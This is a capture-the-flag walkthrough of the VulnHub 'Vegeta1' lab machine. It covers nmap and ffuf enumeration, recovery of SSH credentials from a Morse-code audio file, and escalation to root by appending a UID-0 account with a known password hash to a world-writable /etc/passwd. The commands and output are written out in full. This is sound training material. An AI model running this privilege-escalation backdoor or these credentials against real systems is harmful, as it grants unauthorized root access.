VulnHub - Vegeta1 - Walkthrough

Metadata

IP: 192.168.120.73
Difficulty: Easy

Summary

This machine is exploited by recovering SSH credentials from a Morse code inside an audio file. Privileges escalated by abusing misconfigured file permissions on /etc/passwd.

Enumeration

Nmap

We start off by running an nmap scan:

└─$ sudo nmap -sC -sV -oA initial 192.168.120.73
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-27 17:56 EST
Nmap scan report for 192.168.120.73
Host is up (0.033s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 1f:31:30:67:3f:08:30:2e:6d:ae:e3:20:9e:bd:6b:ba (RSA)
|   256 7d:88:55:a8:6f:56:c8:05:a4:73:82:dc:d8:db:47:59 (ECDSA)
|_  256 cc:de:de:4e:84:a8:91:f5:1a:d6:d2:a6:2e:9e:1c:e0 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 80

Let’s navigate to port 80 through a web browser. By exploring IP in the URL box, it puts up following web page as shown in the below image.

Ffuf

Next, run a ffuf scan with the wordlist /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt as follows:

└─$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u http://192.168.120.73/FUZZ -c -v -fs 119

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.120.73/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response size: 119
________________________________________________

[Status: 301, Size: 314, Words: 20, Lines: 10]
| URL | http://192.168.120.73/img
| --> | http://192.168.120.73/img/
    * FUZZ: img

[Status: 301, Size: 316, Words: 20, Lines: 10]
| URL | http://192.168.120.73/image
| --> | http://192.168.120.73/image/
    * FUZZ: image

[Status: 301, Size: 316, Words: 20, Lines: 10]
| URL | http://192.168.120.73/admin
| --> | http://192.168.120.73/admin/
    * FUZZ: admin

[Status: 301, Size: 317, Words: 20, Lines: 10]
| URL | http://192.168.120.73/manual
| --> | http://192.168.120.73/manual/
    * FUZZ: manual

[Status: 403, Size: 279, Words: 20, Lines: 10]
| URL | http://192.168.120.73/server-status
    * FUZZ: server-status

[Status: 301, Size: 316, Words: 20, Lines: 10]
| URL | http://192.168.120.73/bulma
| --> | http://192.168.120.73/bulma/
    * FUZZ: bulma

:: Progress: [207643/207643] :: Job [1/1] :: 1721 req/sec :: Duration: [0:02:32] :: Errors: 0 ::

From this scan, directory /bulma is discovered.

Web Enumeration

When we explored http://192.168.120.161/bulma/ in browser, we locate a wav file hahahaha.wav:

We will download this file for further investigation:

└─$ wget http://192.168.120.73/bulma/hahahaha.wav
--2022-02-27 18:55:03--  http://192.168.120.73/bulma/hahahaha.wav
Connecting to 192.168.120.73:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 236124 (231K) [audio/x-wav]
Saving to: ‘hahahaha.wav’

hahahaha.wav         100%[==============================================>] 230.59K   593KB/s    in 0.4s    

2022-02-27 18:55:03 (593 KB/s) - ‘hahahaha.wav’ saved [236124/236124]

Exploitation

Morse Code

Listening to the wav file, it sounds like Morse code. By using an online Morse code audio decoder https://morsecode.world/international/decoder/audio-decoder-adaptive.html, we obtain the following message:

ATTTTTTTTTT7 TRUNKS PASSWORD : US3R(S IN DOLLARS SYMBOL)

This can be interpreted as:

Username: TRUNKS

Password: U$3R

SSH

We will try the username password pair trunks:u$3r to SSH into the target:

└─$ ssh trunks@192.168.120.73    
[...]
trunks@192.168.120.73's password: 
Linux Vegeta 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
[...]
trunks@Vegeta:~$ id
uid=1000(trunks) gid=1000(trunks) groups=1000(trunks),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
trunks@Vegeta:~$ 

Privilege Escalation

Initial try to look for the sudo permissions:

trunks@Vegeta:~$ sudo -l
-bash: sudo: command not found
trunks@Vegeta:~$ 

No luck there.

In the home directory /home/trunks/, file .bash_history is present:

trunks@Vegeta:~$ ls -al
total 32
drwxr-xr-x 3 trunks trunks 4096 Aug 12  2020 .
drwxr-xr-x 3 root   root   4096 Jun 28  2020 ..
-rw------- 1 trunks trunks  382 Jun 28  2020 .bash_history
-rw-r--r-- 1 trunks trunks  220 Jun 28  2020 .bash_logout
-rw-r--r-- 1 trunks trunks 3526 Jun 28  2020 .bashrc
drwxr-xr-x 3 trunks trunks 4096 Jun 28  2020 .local
-rw-r--r-- 1 trunks trunks   33 Feb 28 04:14 local.txt
-rw-r--r-- 1 trunks trunks  807 Jun 28  2020 .profile

We find following content from the file:

trunks@Vegeta:~$ cat .bash_history 
perl -le ‘print crypt(“Password@973″,”addedsalt”)’
perl -le 'print crypt("Password@973","addedsalt")'
echo "Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd[/sh]
echo "Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd
ls
su Tom
ls -la
cat .bash_history 
sudo apt-get install vim
apt-get install vim
su root
cat .bash_history 
exit

It looks like user Tom was created; however, user Tom does not exist in /etc/passwd:

trunks@Vegeta:~$ cat /etc/passwd | grep "Tom"
trunks@Vegeta:~$

Moreover, checking file permissions of /etc/passwd, the user trunks has write permission to it:

trunks@Vegeta:~$ ls -al /etc/passwd
-rw-r--r-- 1 trunks root 1486 Jun 28  2020 /etc/passwd

We can use the contents from /home/trunks/.bash_history to append user Tom to /etc/passwd. We can escalate our privilege to root as follows (password will be Password@973):

trunks@Vegeta:~$ echo "Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd
trunks@Vegeta:~$ su Tom
Password: 
root@Vegeta:/home/trunks# id
uid=0(root) gid=0(root) groups=0(root)

Proof

root@Vegeta:~# hostname && whoami && cat proof.txt && ip a
Vegeta
root
a91[...]
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
3: ens35: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:bf:67:0d brd ff:ff:ff:ff:ff:ff
    inet 192.168.120.73/24 brd 192.168.120.255 scope global ens35
       valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:febf:670d/64 scope link 
       valid_lft forever preferred_lft forever